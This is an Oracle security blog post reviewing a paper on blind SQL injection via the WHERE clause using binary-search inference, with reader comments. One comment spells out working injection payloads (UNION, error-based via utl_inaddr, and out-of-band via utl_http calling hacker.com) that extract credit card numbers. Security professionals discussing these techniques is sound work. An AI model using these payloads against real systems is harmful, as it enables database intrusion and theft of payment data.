Call: +44 (0)7759 277220 Call
Blog

Pete Finnigan's Oracle Security Weblog

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.

[Previous entry: "Default Users"] [Next entry: "A grammatically correct random pass phrase generator"]

SQL Injection - accessing additional tables via the where clause



Jaromir emailed me a link to a paper he has written on SQL injection where he manipulates the where clause of an existing statement that can be exploited via SQl injection. Normal wisdom says that if you can only manipulate the where clause you cannot access the data in tables not included in the existing FROM clause. He is using the technique of inference to guess the result. This is similar to the newton-raphson technique used in interest calculations for loans and lease agreements. His first example says is the number of credit cards in the table less than 6 if it is, test if its less than three and home in on the result. This is same technique as Newton-Raphson.

Jaromir then extends the technique to guess the length of a column of a table that he is interested in (Say the credit card number column) and then he extends further to guess the character at each position in each field (column) for each row (the count above).

Jaromir includes examples for reading numbers and strings written in the groovy language and includes a source code download as well as fully worked examples as an appendix.

The paper is titled "Reading Data with the Where Clause", very nice piece of work.

There has been 7 Comments posted on this article


September 29th, 2009 at 06:38 pm

Joxean Koret says:

Eeeerr... You can almost always access data from other tables if you can inject something: Simply, inject an UNION.



September 29th, 2009 at 07:00 pm

Alexander Kornbrust says:

Why so complicated? In the vulnerable code there are much easier ways to get the data from other tables.

------------------------------------------
INPUT: Bud (Original statement)
select product_id, product_name
from product where product_name like 'Bud%';

------------------------------------------
--SQL Injection Using Union (In-Band)
INPUT: Bud' and 1=0 union select customer_i,cc_number from credit_card--

select product_id, product_name
from product where product_name like 'Bud' and 1=0 union select customer_i,cc_number from creditcard--%';

------------------------------------------
-- SQL Injection Using error messages (In-Band)
INPUT: ' or 1=utl_inaddr.get_host_address((select customer_icc_number from credit_card where rownum=1))--

select product_id, product_name
from product where product_name like '' or 1=utl_inaddr.get_host_address((select customer_icc_number from credit_card where rownum=1))--%';

------------------------------------------
-- SQL Injection Using (Out-of-band), requires
INPUT: ' and 1=utl_http.request('http://www.hacker.com/'(select customer_icc_number from credit_card where rownum=1 ))--

select product_id, product_name
from product where product_name like '' and 1=utl_http.request('http://www.hacker.com/'(select customer_icc_number from credit_card where rownum=1 ))--%';

------------------------------------------

More details (Blind, ...) in one of my sql injection presentations...
http://www.red-database-security.com/wp/confidence2009.pdf

Regards

Alexander

Co-Author of "SQL Injection Attacks and Defense" - Syngress



September 29th, 2009 at 07:33 pm

Pete says:

Hi Alex, Joxean

I am aware of all of the methods you suggest of course; indeed I have written about them here many times and also for other publications.

It will be nice if Jaromir can respond here to your observations, I think what he is trying to show - as i said above is inference and how it can be used to read data from other tables. I know others have written papers on a similar theme in the past - Chris Anley I think did so; i just thought it was nice that he shows step by step for those who do not know the technique how to "infer" data values.

cheers

Pete



September 29th, 2009 at 09:28 pm

Jaromir D.B. Nemec says:

Hi Pete,

Thanks for mentioning my document in your blog and the nice review.

Alex, Joxean - my intention was to point out the threat of SQL injection, so the performance and complexity of the approach was not the first criterion. Of course I agree the UNION or error message injection in your comments gives a much simple way to get the same result in the scenario of my example. Anyway I find the logarithmic search usable in some scenarios where the application provides only a limited output.

Regards,

Jaromir D.B. Nemec



September 30th, 2009 at 12:42 am

Alexander KornbrustAlexander Kornbrust says:

Pete,

thanks for the clarification.
The sentence "Normal wisdom says that if you can only manipulate the where clause you cannot access the data in tables not included in the existing FROM clause" was confusing me. What is normal wisdom? Naive people?

The algorithm used by Jaromir is called "Binary Search" not "Newton-Raphson" (which is something different).

For details and differences between both algorithms, see wikipedia:
http://en.wikipedia.org/wiki/Binary_search
http://en.wikipedia.org/wiki/Newton-Raphson

And Jaromir's code is not guessing (Binary Guess), the code is searching (Binary Search) even if the source says something
different. ;-)

Jaromir,
In your logfile it took 91 attempts to guess the creditcard number "1929-10100-01". This can be even faster
using less than 50 attempts by using an enhanced implementation of the binary search.



September 30th, 2009 at 08:40 am

Pete says:

Hi Alex,

No normal wisdom is not naive people.

Remember you have spent years looking at this stuff, 99.99% (thats not a scientific study by the way, its a "turn of phrase&quotwink of the rest of the population hasn't spent the time.

For people who don't know SQL injection and just know SQL, common sense "says" you cannot access data in a table that is not in the FROM clause from there WHERE clause by showing that data in the SELECT clause. That's all i mean smile

Of course we both know that it is possible; as i said before.

I also know its not Newton-Raphson, i mean it's a "similar" technique (again think commentary on someone elses paper not scientific research), homing in on the answer, Newton-Raphson is used where there are two unknowns, in Jaromir's case there is only one. I was trying to write commentary smile and liken the method to something I know, thats all.

cheers

Pete



October 1st, 2009 at 06:41 am

Jaromir D.B. Nemec says:

To avoid confusion and to focus on the original idea I modified the setup. The vulnerable select returns only a Boolean information (available / not found).

@Alex - the mention of "guessing" goes back to the Number Guessing Game that was the inspiration. I will try to optimise the binary search as you suggested. But I have not much hope that this access method will end with performance comparable at least with FTSsmile

Regards,

Jaromir